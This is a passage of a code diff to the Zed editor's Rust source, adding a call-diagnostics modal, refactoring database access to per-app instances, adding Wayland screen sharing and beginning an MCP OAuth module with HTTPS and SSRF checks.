+ let diagnostics = active_room(cx).and_then(|room| room.read(cx).diagnostics().cloned());
+
+ if let Some(diagnostics) = diagnostics {
+ self._diagnostics_subscription = Some(cx.observe(&diagnostics, |_, _, cx| cx.notify()));
+ } else {
+ self._diagnostics_subscription = None;
+ }
+ }
+
+ fn handle_call_event(
+ &mut self,
+ _: Entity<ActiveCall>,
+ event: &room::Event,
+ cx: &mut Context<Self>,
+ ) {
+ match event {
+ room::Event::RoomJoined { .. } => {
+ self.observe_diagnostics(cx);
+ }
+ room::Event::RoomLeft { .. } => {
+ self._diagnostics_subscription = None;
+ cx.notify();
+ }
+ _ => {}
+ }
+ }
+
+ fn dismiss(&mut self, _: &menu::Cancel, _: &mut Window, cx: &mut Context<Self>) {
+ cx.emit(DismissEvent);
+ }
+}
+
+fn active_room(cx: &App) -> Option<Entity<Room>> {
+ ActiveCall::try_global(cx)?.read(cx).room().cloned()
+}
+
+fn quality_label(quality: Option<ConnectionQuality>) -> (&'static str, Color) {
+ match quality {
+ Some(ConnectionQuality::Excellent) => ("Excellent", Color::Success),
+ Some(ConnectionQuality::Good) => ("Good", Color::Success),
+ Some(ConnectionQuality::Poor) => ("Poor", Color::Warning),
+ Some(ConnectionQuality::Lost) => ("Lost", Color::Error),
+ None => ("—", Color::Muted),
+ }
+}
+
+fn metric_rating(label: &str, value_ms: f64) -> (&'static str, Color) {
+ match label {
+ "Latency" => {
+ if value_ms < 100.0 {
+ ("Normal", Color::Success)
+ } else if value_ms < 300.0 {
+ ("High", Color::Warning)
+ } else {
+ ("Poor", Color::Error)
+ }
+ }
+ "Jitter" => {
+ if value_ms < 30.0 {
+ ("Normal", Color::Success)
+ } else if value_ms < 75.0 {
+ ("High", Color::Warning)
+ } else {
+ ("Poor", Color::Error)
+ }
+ }
+ _ => ("Normal", Color::Success),
+ }
+}
+
+fn input_lag_rating(value_ms: f64) -> (&'static str, Color) {
+ if value_ms < 20.0 {
+ ("Normal", Color::Success)
+ } else if value_ms < 50.0 {
+ ("High", Color::Warning)
+ } else {
+ ("Poor", Color::Error)
+ }
+}
+
+fn packet_loss_rating(loss_pct: f64) -> (&'static str, Color) {
+ if loss_pct < 1.0 {
+ ("Normal", Color::Success)
+ } else if loss_pct < 5.0 {
+ ("High", Color::Warning)
+ } else {
+ ("Poor", Color::Error)
+ }
+}
+
+impl EventEmitter<DismissEvent> for CallStatsModal {}
+impl ModalView for CallStatsModal {}
+
+impl Focusable for CallStatsModal {
+ fn focus_handle(&self, _cx: &App) -> FocusHandle {
+ self.focus_handle.clone()
+ }
+}
+
+impl Render for CallStatsModal {
+ fn render(&mut self, _window: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
+ let room = active_room(cx);
+ let is_connected = room.is_some();
+ let stats = room
+ .and_then(|room| {
+ let diagnostics = room.read(cx).diagnostics()?;
+ Some(diagnostics.read(cx).stats().clone())
+ })
+ .unwrap_or_default();
+
+ let (quality_text, quality_color) = quality_label(stats.connection_quality);
+
+ v_flex()
+ .key_context("CallStatsModal")
+ .on_action(cx.listener(Self::dismiss))
+ .track_focus(&self.focus_handle)
+ .elevation_3(cx)
+ .w(rems(24.))
+ .p_4()
+ .gap_3()
+ .child(
+ h_flex()
+ .justify_between()
+ .child(Label::new("Call Diagnostics").size(LabelSize::Large))
+ .child(
+ Label::new(quality_text)
+ .size(LabelSize::Large)
+ .color(quality_color),
+ ),
+ )
+ .when(!is_connected, |this| {
+ this.child(
+ h_flex()
+ .justify_center()
+ .py_4()
+ .child(Label::new("Not in a call").color(Color::Muted)),
+ )
+ })
+ .when(is_connected, |this| {
+ this.child(
+ v_flex()
+ .gap_1()
+ .child(
+ h_flex()
+ .gap_2()
+ .child(Label::new("Network").weight(FontWeight::SEMIBOLD)),
+ )
+ .child(self.render_metric_row(
+ "Latency",
+ "Time for data to travel to the server",
+ stats.latency_ms,
+ |v| format!("{:.0}ms", v),
+ |v| metric_rating("Latency", v),
+ ))
+ .child(self.render_metric_row(
+ "Jitter",
+ "Variance or fluctuation in latency",
+ stats.jitter_ms,
+ |v| format!("{:.0}ms", v),
+ |v| metric_rating("Jitter", v),
+ ))
+ .child(self.render_metric_row(
+ "Packet loss",
+ "Amount of data lost during transfer",
+ stats.packet_loss_pct,
+ |v| format!("{:.1}%", v),
+ |v| packet_loss_rating(v),
+ ))
+ .child(self.render_metric_row(
+ "Input lag",
+ "Delay from audio capture to WebRTC",
+ stats.input_lag.map(|d| d.as_secs_f64() * 1000.0),
+ |v| format!("{:.1}ms", v),
+ |v| input_lag_rating(v),
+ )),
+ )
+ })
+ }
+}
+
+impl CallStatsModal {
+ fn render_metric_row(
+ &self,
+ title: &str,
+ description: &str,
+ value: Option<f64>,
+ format_value: impl Fn(f64) -> String,
+ rate: impl Fn(f64) -> (&'static str, Color),
+ ) -> impl IntoElement {
+ let (rating_text, rating_color, value_text) = match value {
+ Some(v) => {
+ let (rt, rc) = rate(v);
+ (rt, rc, format_value(v))
+ }
+ None => ("—", Color::Muted, "—".to_string()),
+ };
+
+ h_flex()
+ .px_2()
+ .py_1()
+ .rounded_md()
+ .justify_between()
+ .child(
+ v_flex()
+ .child(Label::new(title.to_string()).size(LabelSize::Default))
+ .child(
+ Label::new(description.to_string())
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ ),
+ )
+ .child(
+ v_flex()
+ .items_end()
+ .child(
+ Label::new(rating_text)
+ .size(LabelSize::Default)
+ .color(rating_color),
+ )
+ .child(
+ Label::new(value_text)
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ ),
+ )
+ }
+}
@@ -9,7 +9,7 @@ use channel::{Channel, ChannelEvent, ChannelStore};
use client::{ChannelId, Client, Contact, User, UserStore};
use collections::{HashMap, HashSet};
use contact_finder::ContactFinder;
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use editor::{Editor, EditorElement, EditorStyle};
use fuzzy::{StringMatch, StringMatchCandidate, match_strings};
use gpui::{
@@ -36,8 +36,8 @@ use ui::{
};
use util::{ResultExt, TryFutureExt, maybe};
use workspace::{
- CopyRoomId, Deafen, LeaveCall, MultiWorkspace, Mute, OpenChannelNotes, ScreenShare,
- ShareProject, Workspace,
+ CopyRoomId, Deafen, LeaveCall, MultiWorkspace, Mute, OpenChannelNotes, OpenChannelNotesById,
+ ScreenShare, ShareProject, Workspace,
dock::{DockPosition, Panel, PanelEvent},
notifications::{DetachAndPromptErr, NotifyResultExt},
};
@@ -114,6 +114,13 @@ pub fn init(cx: &mut App) {
});
}
});
+ workspace.register_action(|_, action: &OpenChannelNotesById, window, cx| {
+ let channel_id = client::ChannelId(action.channel_id);
+ let workspace = cx.entity();
+ window.defer(cx, move |window, cx| {
+ ChannelView::open(channel_id, None, workspace, window, cx).detach_and_log_err(cx)
+ });
+ });
// TODO: make it possible to bind this one to a held key for push to talk?
// how to make "toggle_on_modifiers_press" contextual?
workspace.register_action(|_, _: &Mute, _, cx| title_bar::collab::toggle_mute(cx));
@@ -164,6 +171,7 @@ pub fn init(cx: &mut App) {
});
});
});
+ // TODO(jk): Is this action ever triggered?
workspace.register_action(|_, _: &ScreenShare, window, cx| {
let room = ActiveCall::global(cx).read(cx).room().cloned();
if let Some(room) = room {
@@ -172,19 +180,32 @@ pub fn init(cx: &mut App) {
if room.is_sharing_screen() {
room.unshare_screen(true, cx).ok();
} else {
- let sources = cx.screen_capture_sources();
-
- cx.spawn(async move |room, cx| {
- let sources = sources.await??;
- let first = sources.into_iter().next();
- if let Some(first) = first {
- room.update(cx, |room, cx| room.share_screen(first, cx))?
- .await
- } else {
- Ok(())
+ #[cfg(target_os = "linux")]
+ let is_wayland = gpui::guess_compositor() == "Wayland";
+ #[cfg(not(target_os = "linux"))]
+ let is_wayland = false;
+
+ #[cfg(target_os = "linux")]
+ {
+ if is_wayland {
+ room.share_screen_wayland(cx).detach_and_log_err(cx);
}
- })
- .detach_and_log_err(cx);
+ }
+ if !is_wayland {
+ let sources = cx.screen_capture_sources();
+
+ cx.spawn(async move |room, cx| {
+ let sources = sources.await??;
+ let first = sources.into_iter().next();
+ if let Some(first) = first {
+ room.update(cx, |room, cx| room.share_screen(first, cx))?
+ .await
+ } else {
+ Ok(())
+ }
+ })
+ .detach_and_log_err(cx);
+ }
};
});
});
@@ -422,16 +443,17 @@ impl CollabPanel {
.ok()
.flatten()
{
- Some(serialization_key) => cx
- .background_spawn(async move { KEY_VALUE_STORE.read_kvp(&serialization_key) })
- .await
- .context("reading collaboration panel from key value store")
- .log_err()
- .flatten()
- .map(|panel| serde_json::from_str::<SerializedCollabPanel>(&panel))
- .transpose()
- .log_err()
- .flatten(),
+ Some(serialization_key) => {
+ let kvp = cx.update(|_, cx| KeyValueStore::global(cx))?;
+ kvp.read_kvp(&serialization_key)
+ .context("reading collaboration panel from key value store")
+ .log_err()
+ .flatten()
+ .map(|panel| serde_json::from_str::<SerializedCollabPanel>(&panel))
+ .transpose()
+ .log_err()
+ .flatten()
+ }
None => None,
};
@@ -472,19 +494,19 @@ impl CollabPanel {
};
let width = self.width;
let collapsed_channels = self.collapsed_channels.clone();
+ let kvp = KeyValueStore::global(cx);
self.pending_serialization = cx.background_spawn(
async move {
- KEY_VALUE_STORE
- .write_kvp(
- serialization_key,
- serde_json::to_string(&SerializedCollabPanel {
- width,
- collapsed_channels: Some(
- collapsed_channels.iter().map(|cid| cid.0).collect(),
- ),
- })?,
- )
- .await?;
+ kvp.write_kvp(
+ serialization_key,
+ serde_json::to_string(&SerializedCollabPanel {
+ width,
+ collapsed_channels: Some(
+ collapsed_channels.iter().map(|cid| cid.0).collect(),
+ ),
+ })?,
+ )
+ .await?;
anyhow::Ok(())
}
.log_err(),
@@ -2340,9 +2362,7 @@ impl CollabPanel {
.gap_2()
.child(
Button::new("sign_in", button_label)
- .icon_color(Color::Muted)
- .icon(IconName::Github)
- .icon_position(IconPosition::Start)
+ .start_icon(Icon::new(IconName::Github).color(Color::Muted))
.style(ButtonStyle::Filled)
.full_width()
.disabled(is_signing_in)
@@ -2590,9 +2610,9 @@ impl CollabPanel {
Section::Channels => {
Some(
h_flex()
- .gap_1()
.child(
IconButton::new("filter-active-channels", IconName::ListFilter)
+ .icon_size(IconSize::Small)
.toggle_state(self.filter_active_channels)
.when(!self.filter_active_channels, |button| {
button.visible_on_hover("section-header")
@@ -3209,7 +3229,7 @@ impl Panel for CollabPanel {
}
fn activation_priority(&self) -> u32 {
- 6
+ 5
}
}
@@ -1,3 +1,4 @@
+mod call_stats_modal;
pub mod channel_view;
pub mod collab_panel;
pub mod notification_panel;
@@ -18,6 +19,7 @@ use workspace::AppState;
// Another comment, nice.
pub fn init(app_state: &Arc<AppState>, cx: &mut App) {
+ call_stats_modal::init(cx);
channel_view::init(cx);
collab_panel::init(cx);
notification_panel::init(cx);
@@ -3,7 +3,7 @@ use anyhow::Result;
use channel::ChannelStore;
use client::{ChannelId, Client, Notification, User, UserStore};
use collections::HashMap;
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use futures::StreamExt;
use gpui::{
AnyElement, App, AsyncWindowContext, ClickEvent, Context, DismissEvent, Element, Entity,
@@ -186,16 +186,13 @@ impl NotificationPanel {
cx: AsyncWindowContext,
) -> Task<Result<Entity<Self>>> {
cx.spawn(async move |cx| {
- let serialized_panel = if let Some(panel) = cx
- .background_spawn(async move { KEY_VALUE_STORE.read_kvp(NOTIFICATION_PANEL_KEY) })
- .await
- .log_err()
- .flatten()
- {
- Some(serde_json::from_str::<SerializedNotificationPanel>(&panel)?)
- } else {
- None
- };
+ let kvp = cx.update(|_, cx| KeyValueStore::global(cx))?;
+ let serialized_panel =
+ if let Some(panel) = kvp.read_kvp(NOTIFICATION_PANEL_KEY).log_err().flatten() {
+ Some(serde_json::from_str::<SerializedNotificationPanel>(&panel)?)
+ } else {
+ None
+ };
workspace.update_in(cx, |workspace, window, cx| {
let panel = Self::new(workspace, window, cx);
@@ -212,14 +209,14 @@ impl NotificationPanel {
fn serialize(&mut self, cx: &mut Context<Self>) {
let width = self.width;
+ let kvp = KeyValueStore::global(cx);
self.pending_serialization = cx.background_spawn(
async move {
- KEY_VALUE_STORE
- .write_kvp(
- NOTIFICATION_PANEL_KEY.into(),
- serde_json::to_string(&SerializedNotificationPanel { width })?,
- )
- .await?;
+ kvp.write_kvp(
+ NOTIFICATION_PANEL_KEY.into(),
+ serde_json::to_string(&SerializedNotificationPanel { width })?,
+ )
+ .await?;
anyhow::Ok(())
}
.log_err(),
@@ -544,9 +541,7 @@ impl Render for NotificationPanel {
.p_4()
.child(
Button::new("connect_prompt_button", "Connect")
- .icon_color(Color::Muted)
- .icon(IconName::Github)
- .icon_position(IconPosition::Start)
+ .start_icon(Icon::new(IconName::Github).color(Color::Muted))
.style(ButtonStyle::Filled)
.full_width()
.on_click({
@@ -679,6 +674,9 @@ impl Panel for NotificationPanel {
}
fn icon_label(&self, _window: &Window, cx: &App) -> Option<String> {
+ if !NotificationPanelSettings::get_global(cx).show_count_badge {
+ return None;
+ }
let count = self.notification_store.read(cx).unread_notification_count();
if count == 0 {
None
@@ -692,7 +690,7 @@ impl Panel for NotificationPanel {
}
fn activation_priority(&self) -> u32 {
- 8
+ 3
}
}
@@ -15,6 +15,7 @@ pub struct NotificationPanelSettings {
pub button: bool,
pub dock: DockPosition,
pub default_width: Pixels,
+ pub show_count_badge: bool,
}
impl Settings for CollaborationPanelSettings {
@@ -36,6 +37,7 @@ impl Settings for NotificationPanelSettings {
button: panel.button.unwrap(),
dock: panel.dock.unwrap().into(),
default_width: panel.default_width.map(px).unwrap(),
+ show_count_badge: panel.show_count_badge.unwrap(),
};
}
}
@@ -18,7 +18,7 @@ use gpui::{
Action, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable,
ParentElement, Render, Styled, Task, WeakEntity, Window,
};
-use persistence::COMMAND_PALETTE_HISTORY;
+use persistence::CommandPaletteDB;
use picker::Direction;
use picker::{Picker, PickerDelegate};
use postage::{sink::Sink, stream::Stream};
@@ -33,7 +33,11 @@ pub fn init(cx: &mut App) {
cx.observe_new(CommandPalette::register).detach();
}
-impl ModalView for CommandPalette {}
+impl ModalView for CommandPalette {
+ fn is_command_palette(&self) -> bool {
+ true
+ }
+}
pub struct CommandPalette {
picker: Entity<Picker<CommandPaletteDelegate>>,
@@ -180,9 +184,9 @@ struct QueryHistory {
}
impl QueryHistory {
- fn history(&mut self) -> &mut VecDeque<String> {
+ fn history(&mut self, cx: &App) -> &mut VecDeque<String> {
self.history.get_or_insert_with(|| {
- COMMAND_PALETTE_HISTORY
+ CommandPaletteDB::global(cx)
.list_recent_queries()
.unwrap_or_default()
.into_iter()
@@ -190,18 +194,18 @@ impl QueryHistory {
})
}
- fn add(&mut self, query: String) {
- if let Some(pos) = self.history().iter().position(|h| h == &query) {
- self.history().remove(pos);
+ fn add(&mut self, query: String, cx: &App) {
+ if let Some(pos) = self.history(cx).iter().position(|h| h == &query) {
+ self.history(cx).remove(pos);
}
- self.history().push_back(query);
+ self.history(cx).push_back(query);
self.cursor = None;
self.prefix = None;
}
- fn validate_cursor(&mut self, current_query: &str) -> Option<usize> {
+ fn validate_cursor(&mut self, current_query: &str, cx: &App) -> Option<usize> {
if let Some(pos) = self.cursor {
- if self.history().get(pos).map(|s| s.as_str()) != Some(current_query) {
+ if self.history(cx).get(pos).map(|s| s.as_str()) != Some(current_query) {
self.cursor = None;
self.prefix = None;
}
@@ -209,39 +213,39 @@ impl QueryHistory {
self.cursor
}
- fn previous(&mut self, current_query: &str) -> Option<&str> {
- if self.validate_cursor(current_query).is_none() {
+ fn previous(&mut self, current_query: &str, cx: &App) -> Option<&str> {
+ if self.validate_cursor(current_query, cx).is_none() {
self.prefix = Some(current_query.to_string());
}
let prefix = self.prefix.clone().unwrap_or_default();
- let start_index = self.cursor.unwrap_or(self.history().len());
+ let start_index = self.cursor.unwrap_or(self.history(cx).len());
for i in (0..start_index).rev() {
if self
- .history()
+ .history(cx)
.get(i)
.is_some_and(|e| e.starts_with(&prefix))
{
self.cursor = Some(i);
- return self.history().get(i).map(|s| s.as_str());
+ return self.history(cx).get(i).map(|s| s.as_str());
}
}
None
}
- fn next(&mut self, current_query: &str) -> Option<&str> {
- let selected = self.validate_cursor(current_query)?;
+ fn next(&mut self, current_query: &str, cx: &App) -> Option<&str> {
+ let selected = self.validate_cursor(current_query, cx)?;
let prefix = self.prefix.clone().unwrap_or_default();
- for i in (selected + 1)..self.history().len() {
+ for i in (selected + 1)..self.history(cx).len() {
if self
- .history()
+ .history(cx)
.get(i)
.is_some_and(|e| e.starts_with(&prefix))
{
self.cursor = Some(i);
- return self.history().get(i).map(|s| s.as_str());
+ return self.history(cx).get(i).map(|s| s.as_str());
}
}
None
@@ -338,8 +342,8 @@ impl CommandPaletteDelegate {
/// Hit count for each command in the palette.
/// We only account for commands triggered directly via command palette and not by e.g. keystrokes because
/// if a user already knows a keystroke for a command, they are unlikely to use a command palette to look for it.
- fn hit_counts(&self) -> HashMap<String, u16> {
- if let Ok(commands) = COMMAND_PALETTE_HISTORY.list_commands_used() {
+ fn hit_counts(&self, cx: &App) -> HashMap<String, u16> {
+ if let Ok(commands) = CommandPaletteDB::global(cx).list_commands_used() {
commands
.into_iter()
.map(|command| (command.command_name, command.invocations))
@@ -378,21 +382,25 @@ impl PickerDelegate for CommandPaletteDelegate {
direction: Direction,
query: &str,
_window: &mut Window,
- _cx: &mut App,
+ cx: &mut App,
) -> Option<String> {
match direction {
Direction::Up => {
let should_use_history =
self.selected_ix == 0 || self.query_history.is_navigating();
if should_use_history {
- if let Some(query) = self.query_history.previous(query).map(|s| s.to_string()) {
+ if let Some(query) = self
+ .query_history
+ .previous(query, cx)
+ .map(|s| s.to_string())
+ {
return Some(query);
}
}
}
Direction::Down => {
if self.query_history.is_navigating() {
- if let Some(query) = self.query_history.next(query).map(|s| s.to_string()) {
+ if let Some(query) = self.query_history.next(query, cx).map(|s| s.to_string()) {
return Some(query);
} else {
let prefix = self.query_history.prefix.take().unwrap_or_default();
@@ -444,7 +452,7 @@ impl PickerDelegate for CommandPaletteDelegate {
let task = cx.background_spawn({
let mut commands = self.all_commands.clone();
- let hit_counts = self.hit_counts();
+ let hit_counts = self.hit_counts(cx);
let executor = cx.background_executor().clone();
let query = normalize_action_query(query_str);
let query_for_link = query_str.to_string();
@@ -566,7 +574,7 @@ impl PickerDelegate for CommandPaletteDelegate {
}
if !self.latest_query.is_empty() {
- self.query_history.add(self.latest_query.clone());
+ self.query_history.add(self.latest_query.clone(), cx);
self.query_history.reset_cursor();
}
@@ -581,9 +589,9 @@ impl PickerDelegate for CommandPaletteDelegate {
self.commands.clear();
let command_name = command.name.clone();
let latest_query = self.latest_query.clone();
+ let db = CommandPaletteDB::global(cx);
cx.background_spawn(async move {
- COMMAND_PALETTE_HISTORY
- .write_command_invocation(command_name, latest_query)
+ db.write_command_invocation(command_name, latest_query)
.await
})
.detach_and_log_err(cx);
@@ -771,11 +779,9 @@ mod tests {
#[gpui::test]
async fn test_command_palette(cx: &mut TestAppContext) {
- persistence::COMMAND_PALETTE_HISTORY
- .clear_all()
- .await
- .unwrap();
let app_state = init_test(cx);
+ let db = cx.update(|cx| persistence::CommandPaletteDB::global(cx));
+ db.clear_all().await.unwrap();
let project = Project::test(app_state.fs.clone(), [], cx).await;
let (multi_workspace, cx) =
cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
@@ -69,7 +69,7 @@ impl Domain for CommandPaletteDB {
)];
}
-db::static_connection!(COMMAND_PALETTE_HISTORY, CommandPaletteDB, []);
+db::static_connection!(CommandPaletteDB, []);
impl CommandPaletteDB {
pub async fn write_command_invocation(
@@ -48,7 +48,10 @@ fn main() {
let user_store = cx.new(|cx| UserStore::new(client.clone(), cx));
let workspace_store = cx.new(|cx| WorkspaceStore::new(client.clone(), cx));
let session_id = uuid::Uuid::new_v4().to_string();
- let session = cx.foreground_executor().block_on(Session::new(session_id));
+ let kvp = db::kvp::KeyValueStore::global(cx);
+ let session = cx
+ .foreground_executor()
+ .block_on(Session::new(session_id, kvp));
let session = cx.new(|cx| AppSession::new(session, cx));
let node_runtime = NodeRuntime::unavailable();
@@ -9,7 +9,7 @@ use gpui::{
use gpui::{ListState, ScrollHandle, ScrollStrategy, UniformListScrollHandle};
use language::LanguageRegistry;
use notifications::status_toast::{StatusToast, ToastIcon};
-use persistence::COMPONENT_PREVIEW_DB;
+use persistence::ComponentPreviewDb;
use project::Project;
use std::{iter::Iterator, ops::Range, sync::Arc};
use ui::{ButtonLike, Divider, HighlightedLabel, ListItem, ListSubHeader, Tooltip, prelude::*};
@@ -784,7 +784,7 @@ impl SerializableItem for ComponentPreview {
cx: &mut App,
) -> Task<anyhow::Result<Entity<Self>>> {
let deserialized_active_page =
- match COMPONENT_PREVIEW_DB.get_active_page(item_id, workspace_id) {
+ match ComponentPreviewDb::global(cx).get_active_page(item_id, workspace_id) {
Ok(page) => {
if let Some(page) = page {
ActivePageId(page)
@@ -845,7 +845,7 @@ impl SerializableItem for ComponentPreview {
alive_items,
workspace_id,
"component_previews",
- &COMPONENT_PREVIEW_DB,
+ &ComponentPreviewDb::global(cx),
cx,
)
}
@@ -860,9 +860,9 @@ impl SerializableItem for ComponentPreview {
) -> Option<Task<anyhow::Result<()>>> {
let active_page = self.active_page_id(cx);
let workspace_id = self.workspace_id?;
+ let db = ComponentPreviewDb::global(cx);
Some(cx.background_spawn(async move {
- COMPONENT_PREVIEW_DB
- .save_active_page(item_id, workspace_id, active_page.0)
+ db.save_active_page(item_id, workspace_id, active_page.0)
.await
}))
}
@@ -23,7 +23,7 @@ impl Domain for ComponentPreviewDb {
)];
}
-db::static_connection!(COMPONENT_PREVIEW_DB, ComponentPreviewDb, [WorkspaceDb]);
+db::static_connection!(ComponentPreviewDb, [WorkspaceDb]);
impl ComponentPreviewDb {
pub async fn save_active_page(
@@ -17,6 +17,7 @@ test-support = ["gpui/test-support"]
[dependencies]
anyhow.workspace = true
async-trait.workspace = true
+base64.workspace = true
collections.workspace = true
futures.workspace = true
gpui.workspace = true
@@ -24,14 +25,17 @@ http_client = { workspace = true, features = ["test-support"] }
log.workspace = true
net.workspace = true
parking_lot.workspace = true
+rand.workspace = true
postage.workspace = true
schemars.workspace = true
serde_json.workspace = true
serde.workspace = true
settings.workspace = true
+sha2.workspace = true
slotmap.workspace = true
smol.workspace = true
tempfile.workspace = true
+tiny_http.workspace = true
url = { workspace = true, features = ["serde"] }
util.workspace = true
terminal.workspace = true
@@ -35,7 +35,7 @@ pub const METHOD_NOT_FOUND: i32 = -32601;
pub const INVALID_PARAMS: i32 = -32602;
pub const INTERNAL_ERROR: i32 = -32603;
-type ResponseHandler = Box<dyn Send + FnOnce(Result<String, Error>)>;
+type ResponseHandler = Box<dyn Send + FnOnce(String)>;
type NotificationHandler = Box<dyn Send + FnMut(Value, AsyncApp)>;
type RequestHandler = Box<dyn Send + FnMut(RequestId, &RawValue, AsyncApp)>;
@@ -62,6 +62,14 @@ pub(crate) struct Client {
#[allow(dead_code)]
transport: Arc<dyn Transport>,
request_timeout: Option<Duration>,
+ /// Single-slot side channel for the last transport-level error. When the
+ /// output task encounters a send failure it stashes the error here and
+ /// exits; the next request to observe cancellation `.take()`s it so it can
+ /// propagate a typed error (e.g. `TransportError::AuthRequired`) instead
+ /// of a generic "cancelled". This works because `initialize` is the sole
+ /// in-flight request at startup, but would need rethinking if concurrent
+ /// requests are ever issued during that phase.
+ last_transport_error: Arc<Mutex<Option<anyhow::Error>>>,
}
#[derive(Clone, Debug, PartialEq, Eq, PartialOrd, Ord, Hash)]
@@ -223,13 +231,16 @@ impl Client {
input.or(err)
});
+ let last_transport_error: Arc<Mutex<Option<anyhow::Error>>> = Arc::new(Mutex::new(None));
let output_task = cx.background_spawn({
let transport = transport.clone();
+ let last_transport_error = last_transport_error.clone();
Self::handle_output(
transport,
outbound_rx,
output_done_tx,
response_handlers.clone(),
+ last_transport_error,
)
.log_err()
});
@@ -246,6 +257,7 @@ impl Client {
output_done_rx: Mutex::new(Some(output_done_rx)),
transport,
request_timeout,
+ last_transport_error,
})
}
@@ -279,7 +291,7 @@ impl Client {
if let Some(handlers) = response_handlers.lock().as_mut()
&& let Some(handler) = handlers.remove(&response.id)
{
- handler(Ok(message.to_string()));
+ handler(message.to_string());
}
} else if let Ok(notification) = serde_json::from_str::<AnyNotification>(&message) {
subscription_set.lock().notify(
@@ -315,6 +327,7 @@ impl Client {
outbound_rx: channel::Receiver<String>,
output_done_tx: barrier::Sender,
response_handlers: Arc<Mutex<Option<HashMap<RequestId, ResponseHandler>>>>,
+ last_transport_error: Arc<Mutex<Option<anyhow::Error>>>,
) -> anyhow::Result<()> {
let _clear_response_handlers = util::defer({
let response_handlers = response_handlers.clone();
@@ -324,7 +337,11 @@ impl Client {
});
while let Ok(message) = outbound_rx.recv().await {
log::trace!("outgoing message: {}", message);
- transport.send(message).await?;
+ if let Err(err) = transport.send(message).await {
+ log::debug!("transport send failed: {:#}", err);
+ *last_transport_error.lock() = Some(err);
+ return Ok(());
+ }
}
drop(output_done_tx);
Ok(())
@@ -408,7 +425,7 @@ impl Client {
response = rx.fuse() => {
let elapsed = started.elapsed();
log::trace!("took {elapsed:?} to receive response to {method:?} id {id}");
- match response? {
+ match response {
Ok(response) => {
let parsed: AnyResponse = serde_json::from_str(&response)?;
if let Some(error) = parsed.error {
@@ -419,7 +436,12 @@ impl Client {
anyhow::bail!("Invalid response: no result or error");
}
}
- Err(_) => anyhow::bail!("cancelled")
+ Err(_canceled) => {
+ if let Some(err) = self.last_transport_error.lock().take() {
+ return Err(err);
+ }
+ anyhow::bail!("cancelled")
+ }
}
}
_ = cancel_fut => {
@@ -1,5 +1,6 @@
pub mod client;
pub mod listener;
+pub mod oauth;
pub mod protocol;
#[cfg(any(test, feature = "test-support"))]
pub mod test;
@@ -0,0 +1,2800 @@
+//! OAuth 2.0 authentication for MCP servers using the Authorization Code +
+//! PKCE flow, per the MCP spec's OAuth profile.
+//!
+//! The flow is split into two phases:
+//!
+//! 1. **Discovery** ([`discover`]) fetches Protected Resource Metadata and
+//! Authorization Server Metadata. This can happen early (e.g. on a 401
+//! during server startup) because it doesn't need the redirect URI yet.
+//!
+//! 2. **Client registration** ([`resolve_client_registration`]) is separate
+//! because DCR requires the actual loopback redirect URI, which includes an
+//! ephemeral port that only exists once the callback server has started.
+//!
+//! After authentication, the full state is captured in [`OAuthSession`] which
+//! is persisted to the keychain. On next startup, the stored session feeds
+//! directly into [`McpOAuthTokenProvider`], giving a refresh-capable provider
+//! without requiring another browser flow.
+
+use anyhow::{Context as _, Result, anyhow, bail};
+use async_trait::async_trait;
+use base64::Engine as _;
+use futures::AsyncReadExt as _;
+use futures::channel::mpsc;
+use http_client::{AsyncBody, HttpClient, Request};
+use parking_lot::Mutex as SyncMutex;
+use rand::Rng as _;
+use serde::{Deserialize, Serialize};
+use sha2::{Digest, Sha256};
+
+use std::str::FromStr;
+use std::sync::Arc;
+use std::time::{Duration, SystemTime};
+use url::Url;
+use util::ResultExt as _;
+
+/// The CIMD URL where Zed's OAuth client metadata document is hosted.
+pub const CIMD_URL: &str = "https://zed.dev/oauth/client-metadata.json";
+
+/// Validate that a URL is safe to use as an OAuth endpoint.
+///
+/// OAuth endpoints carry sensitive material (authorization codes, PKCE
+/// verifiers, tokens) and must use TLS. Plain HTTP is only permitted for
+/// loopback addresses, per RFC 8252 Section 8.3.
+fn require_https_or_loopback(url: &Url) -> Result<()> {
+ if url.scheme() == "https" {
+ return Ok(());
+ }
+ if url.scheme() == "http" {
+ if let Some(host) = url.host() {
+ match host {
+ url::Host::Ipv4(ip) if ip.is_loopback() => return Ok(()),
+ url::Host::Ipv6(ip) if ip.is_loopback() => return Ok(()),
+ url::Host::Domain(d) if d.eq_ignore_ascii_case("localhost") => return Ok(()),
+ _ => {}
+ }
+ }
+ }
+ bail!(
+ "OAuth endpoint must use HTTPS (got {}://{})",
+ url.scheme(),
+ url.host_str().unwrap_or("?")
+ )
+}
+
+/// Validate that a URL is safe to use as an OAuth endpoint, including SSRF
+/// protections against private/reserved IP ranges.
+///
+/// This wraps [`require_https_or_loopback`] and adds IP-range checks to prevent
+/// an attacker-controlled MCP server from directing Zed to fetch internal
+/// network resources via metadata URLs.
+///
+/// **Known limitation:** Domain-name URLs that resolve to private IPs are *not*
+/// blocked here — full mitigation requires resolver-level validation (e.g. a
+/// custom `Resolve` implementation). This function only blocks IP-literal URLs.
+fn validate_oauth_url(url: &Url) -> Result<()> {
+ require_https_or_loopback(url)?;
+
+ if let Some(host) = url.host() {
+ match host {
+ url::Host::Ipv4(ip) => {
+ // Loopback is already allowed by require_https_or_loopback.
+ if ip.is_private() || ip.is_link_local() || ip.is_broadcast() || ip.is_unspecified()
+ {
+ bail!(
+ "OAuth endpoint must not point to private/reserved IP: {}",
+ ip
+ );
+ }
+ }
+ url::Host::Ipv6(ip) => {
+ // Check for IPv4-mapped IPv6 addresses (::ffff:a.b.c.d) which
+ // could bypass the IPv4 checks above.
+ if let Some(mapped_v4) = ip.to_ipv4_mapped() {
+ if mapped_v4.is_private()
+ || mapped_v4.is_link_local()
+ || mapped_v4.is_broadcast()
+ || mapped_v4.is_unspecified()
+ {
+ bail!(
+ "OAuth endpoint must not point to private/reserved IP: ::ffff:{}",
+ mapped_v4
+ );
+ }
+ }
+
+ if ip.is_unspecified() || ip.is_multicast() {
+ bail!(
+ "OAuth endpoint must not point to reserved IPv6 address: {}",
+ ip
+ );
+ }
+ // IPv6 Unique Local Addresses (fc00::/7). is_unique_local() is
+ // nightly-only, so check the prefix manually.
